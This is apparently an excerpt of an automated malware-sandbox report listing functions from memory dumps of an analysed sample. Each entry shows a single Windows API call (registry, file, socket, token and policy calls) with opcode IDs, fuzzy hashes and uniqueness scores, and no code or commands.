                                                                      • GetProcessTimes.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: 654450cead337efdcf8dcbe3de86ae2f40e29ec3ca6ff1baab1614dd7f4a5f1e
                                                                      • Instruction ID: 117e36621f830b4cf3eb28613938244420e5ddfc286fb040b93290db127135b2
                                                                      • Opcode Fuzzy Hash: 654450cead337efdcf8dcbe3de86ae2f40e29ec3ca6ff1baab1614dd7f4a5f1e
                                                                      • Instruction Fuzzy Hash: 3731C572509384AFEB12CF24DC45FA6BFB8EF46314F0884DBE9859B153C225A905C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFAC1D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFACD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 89bae1ac82663a6d3d099d1a934e3adbef52366ee0dd62ba283bd892ccbb146e
                                                                      • Instruction ID: a442a37e226e23d1471e36ad09146cf475bb20e81c6bef00b672695aefd2701b
                                                                      • Opcode Fuzzy Hash: 89bae1ac82663a6d3d099d1a934e3adbef52366ee0dd62ba283bd892ccbb146e
                                                                      • Instruction Fuzzy Hash: B231B372104384AFE722CF61CC84FA2BFF8EF06314F18849AE9858B253D764E449CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052905CC, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 937d7fd2b81a006f0c47555255579f4b9f95de8997fae2a99ee9fb91780baa0e
                                                                      • Instruction ID: 3e8372b15ca2aca4a4487638346427cf842f4d78a80e44fd9032f8a29cbca4ab
                                                                      • Opcode Fuzzy Hash: 937d7fd2b81a006f0c47555255579f4b9f95de8997fae2a99ee9fb91780baa0e
                                                                      • Instruction Fuzzy Hash: F831C2B2404784AFE722CB55DC45F96FFF8EF06320F04859EE9849B262D365A909CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFAFCF, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFB06C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationToken
                                                                      • String ID:
                                                                      • API String ID: 4114910276-0
                                                                      • Opcode ID: ee96b00ccf1839cdfa5f7aa78ce07173b08cf7de8252ad72a4876826ee5420b0
                                                                      • Instruction ID: 697970b3881ab314b0c2e38ff8e8eb414844a93c81adcf78298cc79b597a3d76
                                                                      • Opcode Fuzzy Hash: ee96b00ccf1839cdfa5f7aa78ce07173b08cf7de8252ad72a4876826ee5420b0
                                                                      • Instruction Fuzzy Hash: B831C371109380AFD712CB64DC85F97BFB8EF06310F0884ABEA85DB152D264A908C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290959, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateMutexW.KERNEL32(?,?), ref: 052909F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: 6232730f93d18c6e7f5ee8b2811a4c5cc2a5c2bb588e8f6b5b26213d55773e40
                                                                      • Instruction ID: eb3e213cf9827c9c0d510fecc7820e7258d8d49b786bfa8767c0671daf8a83fd
                                                                      • Opcode Fuzzy Hash: 6232730f93d18c6e7f5ee8b2811a4c5cc2a5c2bb588e8f6b5b26213d55773e40
                                                                      • Instruction Fuzzy Hash: 7131C3B1509384AFE712CF25CC85F56FFE8EF06610F08849EE9888B292D375E904CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFB2F3, Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 02AFB38F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: OpenPolicy
                                                                      • String ID:
                                                                      • API String ID: 2030686058-0
                                                                      • Opcode ID: 2d45a8758f3d3aa1cdf53623afd65f199c41ef79cdaf490b41bfbd397d259217
                                                                      • Instruction ID: a922968c20e89d8b0121188fdfa6f90bce8d2469911ce97ec4ef933d19d98d0b
                                                                      • Opcode Fuzzy Hash: 2d45a8758f3d3aa1cdf53623afd65f199c41ef79cdaf490b41bfbd397d259217
                                                                      • Instruction Fuzzy Hash: 8F219172504344AFE721CF64DC85F6ABFB8EF46710F18899AED849B252D364A808CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05293C22, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getaddrinfo.WS2_32(?,00000E2C), ref: 05293CC7
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getaddrinfo
                                                                      • String ID:
                                                                      • API String ID: 300660673-0
                                                                      • Opcode ID: 62a43bd5e892fc5187e690216c7b049af34832150331a0ed9ef6deeb04bae326
                                                                      • Instruction ID: 006f8b254fb4deaed064b3655e779c3da6a69b25a113da41e7b2ba7606674b6f
                                                                      • Opcode Fuzzy Hash: 62a43bd5e892fc5187e690216c7b049af34832150331a0ed9ef6deeb04bae326
                                                                      • Instruction Fuzzy Hash: D021D371100304BFFB20DB64CC85FA6FBACEF44710F10895AFE459A241D6B5A9098BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529518C, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32GetModuleInformation.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 0529521E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationModule
                                                                      • String ID:
                                                                      • API String ID: 3425974696-0
                                                                      • Opcode ID: 6b6d66c6e3b640d1732d1555791b739ee683df46312ce14467c839f4df771df5
                                                                      • Instruction ID: a87fb3168cdb1184405fb0dd7068e9e94ed18d8a2c3401d0db2a9d469072f0ca
                                                                      • Opcode Fuzzy Hash: 6b6d66c6e3b640d1732d1555791b739ee683df46312ce14467c839f4df771df5
                                                                      • Instruction Fuzzy Hash: 9F21B671609380AFEB12CB25DC44F67BFACEF46310F08849BE985CB252D265E809CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529359C, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 05293635
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CurrentOpenUser
                                                                      • String ID:
                                                                      • API String ID: 1571386571-0
                                                                      • Opcode ID: 89d48415691034715110d5c88ec7ded6be0e40983962f162443a76be3de28461
                                                                      • Instruction ID: a00ca40164922f8f81eab99cdbc7f16dae1db83a91a189b177457423b3368d92
                                                                      • Opcode Fuzzy Hash: 89d48415691034715110d5c88ec7ded6be0e40983962f162443a76be3de28461
                                                                      • Instruction Fuzzy Hash: EE21B171409384AFEB12CB24DC45F66BFA8EF46710F08849BED849F253D264A909CB75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFA120, Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • gethostname.WS2_32(?,00000E2C,?,?), ref: 02AFA1C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: gethostname
                                                                      • String ID:
                                                                      • API String ID: 144339138-0
                                                                      • Opcode ID: b12a611b4489d4efb89c77cd8b439ba5d6f694fd685b026bb3a30f6d443a190b
                                                                      • Instruction ID: c2a0ff5611e513bc808e2965131e4178a6e692ae78213cabc749bc792adf306d
                                                                      • Opcode Fuzzy Hash: b12a611b4489d4efb89c77cd8b439ba5d6f694fd685b026bb3a30f6d443a190b
                                                                      • Instruction Fuzzy Hash: 8131D67140D3C06FD7038B758C55B62BFB4EF87610F1985DBD9848F1A3D225A909CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052913C1, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 0529146E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      • Opcode ID: 38c09484d695839ffe99445355badde929692aebfa669468d8d558a0506631c3
                                                                      • Instruction ID: be53caf005b0d352ce71c055d2b095344394f81e821bec9e98e22b9bf5829355
                                                                      • Opcode Fuzzy Hash: 38c09484d695839ffe99445355badde929692aebfa669468d8d558a0506631c3
                                                                      • Instruction Fuzzy Hash: 9031A0715093C06FD3138B259C51F62BFB8EF87610F1A81DBE8848B563D264A909C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05295284, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 0529532A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileModuleName
                                                                      • String ID:
                                                                      • API String ID: 514040917-0
                                                                      • Opcode ID: df8c00bb3449c69d6e5b3c241d59a80a20a745aec45adecc68aaf34fa7f3b3b5
                                                                      • Instruction ID: 1590794d2f2c4e077eb58db5c093da4b993f88c7803c1c173c2d265f3cf45281
                                                                      • Opcode Fuzzy Hash: df8c00bb3449c69d6e5b3c241d59a80a20a745aec45adecc68aaf34fa7f3b3b5
                                                                      • Instruction Fuzzy Hash: 8D21A0715093C06FD712CB65CC55F66BFB8EF87610F1984DBE8848B1A3D624A909C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052950A5, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegSetValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05295144
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 89886937243fe2d74685dcda9cbbda01ac1975be3bfbb0a328b79461307db1cd
                                                                      • Instruction ID: 9a457fe2f5df8b8f6e53f5dde03292e33e2b11f2b179bfa9481e9deb145b2baf
                                                                      • Opcode Fuzzy Hash: 89886937243fe2d74685dcda9cbbda01ac1975be3bfbb0a328b79461307db1cd
                                                                      • Instruction Fuzzy Hash: 90219A72645380AFDB228B15CC41F67FFB8EF46710F08849BE9859B252D264E849C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05292FED, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetPerAdapterInfo.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293077
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdapterInfo
                                                                      • String ID:
                                                                      • API String ID: 3405139893-0
                                                                      • Opcode ID: 5e90eaff8b83430644abc9f678ac463f80fe89f8d70c408af96f290109535650
                                                                      • Instruction ID: d53058b9177aa658b9b5d5ad5dc9c3279594074195cbf4852b4e10649bdda28d
                                                                      • Opcode Fuzzy Hash: 5e90eaff8b83430644abc9f678ac463f80fe89f8d70c408af96f290109535650
                                                                      • Instruction Fuzzy Hash: A521D37100D384AFDB26CB20DC45F66FFB8EF46310F0884DBE9889F292D265A509C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529121B, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052912AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      • String ID:
                                                                      • API String ID: 31538577-0
                                                                      • Opcode ID: 705035f6d4a38cd02a877b192157b6091f0c7adeca81f0ac14bb2230a0b74010
                                                                      • Instruction ID: 7f1a02af047e363450d1e144b79c646ecf1435a756f1a9bb51e7c9efee6b0549
                                                                      • Opcode Fuzzy Hash: 705035f6d4a38cd02a877b192157b6091f0c7adeca81f0ac14bb2230a0b74010
                                                                      • Instruction Fuzzy Hash: 8D219272409384AFDB12CB65DC44F97FFB8EF46310F1884ABEA84DB252D264A508C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05292EED, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05292F85
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdaptersAddresses
                                                                      • String ID:
                                                                      • API String ID: 2506852604-0
                                                                      • Opcode ID: 3b911121b0fb6d0d09fd09852590037798f81eba682c10328c1c9afb3875573a
                                                                      • Instruction ID: f150cd4e47e58bf692991772f8060cbca4a9d62975d4eaa67ba520ebb352970e
                                                                      • Opcode Fuzzy Hash: 3b911121b0fb6d0d09fd09852590037798f81eba682c10328c1c9afb3875573a
                                                                      • Instruction Fuzzy Hash: 83219475409380AFDB128B25CC55FA6FFB8EF46310F1885DBE9859F253C365A809CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052937AF, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293840
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeNotifyValue
                                                                      • String ID:
                                                                      • API String ID: 3933585183-0
                                                                      • Opcode ID: a04e6f6ff5c438e06eebc16fb9b3037b74bf2500a23fa3c7be6ee029ec5bc924
                                                                      • Instruction ID: 56f8a26895420448b7692edb0224055b3502807cce698a5b6c2d1a37d275cdc1
                                                                      • Opcode Fuzzy Hash: a04e6f6ff5c438e06eebc16fb9b3037b74bf2500a23fa3c7be6ee029ec5bc924
                                                                      • Instruction Fuzzy Hash: AF21A171409384AFDB22CF64DC44F97FFB8EF46310F04899BEA859B252D265A508CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052904EA, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 05290575
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      • String ID:
                                                                      • API String ID: 1680863896-0
                                                                      • Opcode ID: 50558d0b10db798897bb922879236f0e49ee6db124af4e1a1a6c789f4b4e04c8
                                                                      • Instruction ID: b049a2b23e580ee5036ca223bc85c1eea3229d0e95004cad702657ed109e821e
                                                                      • Opcode Fuzzy Hash: 50558d0b10db798897bb922879236f0e49ee6db124af4e1a1a6c789f4b4e04c8
                                                                      • Instruction Fuzzy Hash: 0421BFB1509380AFE721CB25CC44F66FFE8EF45210F08849EE9858B252D375E908CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052936C2, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05293741
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 2dee9419791aa7aafec82f57001d54683b2b4ad0e1dc50dd3d7d54397c683a28
                                                                      • Instruction ID: e7ab6258e3d80c6c59ea258ce92931963e74dd93fa71ecdfe4f69b987259c0b5
                                                                      • Opcode Fuzzy Hash: 2dee9419791aa7aafec82f57001d54683b2b4ad0e1dc50dd3d7d54397c683a28
                                                                      • Instruction Fuzzy Hash: E821AFB2500204AFEB20DF65DC84FABBBECEF54710F14896BEE45DB241D664E5088BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFBD00, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileType.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFBD95
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID:
                                                                      • API String ID: 3081899298-0
                                                                      • Opcode ID: e136deb5e30d48162f286af3d9747a2e01ee06e3a9badd212b9e4d4f4a623df5
                                                                      • Instruction ID: cbbd8b141ccb958b1694b6fec356e73f9cf914f18a32c4d2b2d19ccec7ec7d33
                                                                      • Opcode Fuzzy Hash: e136deb5e30d48162f286af3d9747a2e01ee06e3a9badd212b9e4d4f4a623df5
                                                                      • Instruction Fuzzy Hash: 4E21D6B64087846FE712CB25DC41BA2BFB8EF47724F18849BE9849B153D264A905C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290007, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290091
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: dc04c1a925d6d9120c100d012f304ba7867e4d9b8b573c30b75b260ae80ce9b0
                                                                      • Instruction ID: 9493f324231aa01d9cf7e7f07a1c7469a6671cea59fa7ab43da497e1b9534a81
                                                                      • Opcode Fuzzy Hash: dc04c1a925d6d9120c100d012f304ba7867e4d9b8b573c30b75b260ae80ce9b0
                                                                      • Instruction Fuzzy Hash: 0E21A172404344AFEB228F55DC44FA7BFA8EF46720F0484ABFA459B252D265A809CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052934C3, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RasConnectionNotificationW.RASAPI32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 0529355F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionNotification
                                                                      • String ID:
                                                                      • API String ID: 1402429939-0
                                                                      • Opcode ID: cf6a0e074dfbe5e5474d00324b5d41a6c6596080d7ce26c1e266767551c0998b
                                                                      • Instruction ID: 3acad1cc207a6312f1b14b903cb6e83803cb25643138ed5b9b7f26f7d7437573
                                                                      • Opcode Fuzzy Hash: cf6a0e074dfbe5e5474d00324b5d41a6c6596080d7ce26c1e266767551c0998b
                                                                      • Instruction Fuzzy Hash: 1D21BF71409384AFE7128B25CC55FA2FFB8EF07314F0884DBE9888B293C224A909C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFB82E, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSASocketW.WS2_32(?,?,?,?,?), ref: 02AFB8BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Socket
                                                                      • String ID:
                                                                      • API String ID: 38366605-0
                                                                      • Opcode ID: 86f6d4c5652888a85023c9f12b368bebb945b8d41d94c36fbc154f9b299c9c3b
                                                                      • Instruction ID: 8fc70cd31c9b3998c467e88fa6f8e4f1d64fe2d8c5fc1b6238266e0611c0d558
                                                                      • Opcode Fuzzy Hash: 86f6d4c5652888a85023c9f12b368bebb945b8d41d94c36fbc154f9b299c9c3b
                                                                      • Instruction Fuzzy Hash: C3219171509380AFE722CF65DC85F56FFF8EF49210F08859EEA859B252D375A408CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05292184, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 05292215
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ExtentPoint32Text
                                                                      • String ID:
                                                                      • API String ID: 223599850-0
                                                                      • Opcode ID: 8f7d2589f065e3bb347b7d9b7f25d73acadef09c72b090a1919bd01ed5e22033
                                                                      • Instruction ID: 90dd360417613095399414b67c7ff6dfdbca10cf4a528f8d6e16223e3c0dd56e
                                                                      • Opcode Fuzzy Hash: 8f7d2589f065e3bb347b7d9b7f25d73acadef09c72b090a1919bd01ed5e22033
                                                                      • Instruction Fuzzy Hash: 22217F755093C0AFD7128B65DC54B62BFF4EF46210F0984DBE985CB263D2259808CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294EE8, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CopyFileW.KERNEL32(?,?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05294F6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CopyFile
                                                                      • String ID:
                                                                      • API String ID: 1304948518-0
                                                                      • Opcode ID: a7d347b2f4a753d1081569c4cfb8b7e4467f598031c7b52502ef22ca2eef563b
                                                                      • Instruction ID: 004c5cd2029098e266d4fc8bb8da312a11abb06fc8144f763adc635dd9cf8966
                                                                      • Opcode Fuzzy Hash: a7d347b2f4a753d1081569c4cfb8b7e4467f598031c7b52502ef22ca2eef563b
                                                                      • Instruction Fuzzy Hash: 0A2190725093815FEB16CB25DC45BA2BFE8BF46210F0D84DAE989CF263D274D909CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFBC2A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 02AFBCA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 4dda5ed1ab58d3400abfbda64ed46c5884a6453b8ccf829c457ee68259857ce7
                                                                      • Instruction ID: bac2a23b442197e5b2199cc494e51cefbd03996ef6a081c18eeab5010b9cec7b
                                                                      • Opcode Fuzzy Hash: 4dda5ed1ab58d3400abfbda64ed46c5884a6453b8ccf829c457ee68259857ce7
                                                                      • Instruction Fuzzy Hash: 73219A71500600AFEB21DF65C884F67FBE8EF08714F14886AEE858B252DB75E406CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294FC5, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32EnumProcessModules.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05295046
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EnumModulesProcess
                                                                      • String ID:
                                                                      • API String ID: 1082081703-0
                                                                      • Opcode ID: 6348d314b10d8dc40e6199663c744ba624442eeefcd380dc83e1259b303766ba
                                                                      • Instruction ID: 7584432ba02d31a4863f11202dbdf57613e442b1a3efe2f5f148fac5228996fb
                                                                      • Opcode Fuzzy Hash: 6348d314b10d8dc40e6199663c744ba624442eeefcd380dc83e1259b303766ba
                                                                      • Instruction Fuzzy Hash: 3B21C572504380AFEB12CF64DC45F67FFA8EF46310F0884ABEA85DB252D265A808C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529024E, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052902E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 6a1a4965fc3feafd7f416251cdeacad921dd617903db4ca80cb79db115c2e25f
                                                                      • Instruction ID: 6beb041d671b301e3b112cb7b616064df82ab8da6022ec52289aed7832bb9180
                                                                      • Opcode Fuzzy Hash: 6a1a4965fc3feafd7f416251cdeacad921dd617903db4ca80cb79db115c2e25f
                                                                      • Instruction Fuzzy Hash: 19219D72505344AFDB21CF65CC44F67FFF8EF06710F08859AEA899B252D264E808CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290F5D, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290FE3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      • String ID:
                                                                      • API String ID: 3358416759-0
                                                                      • Opcode ID: 305846d2b79f474a9fbcef2d029c69f9d5313d8c44b9a04a128982924737277b
                                                                      • Instruction ID: 05b2e805e9c6169753d83d8fdbed340c4aed69b0c0b564d27c574eff555fc5c7
                                                                      • Opcode Fuzzy Hash: 305846d2b79f474a9fbcef2d029c69f9d5313d8c44b9a04a128982924737277b
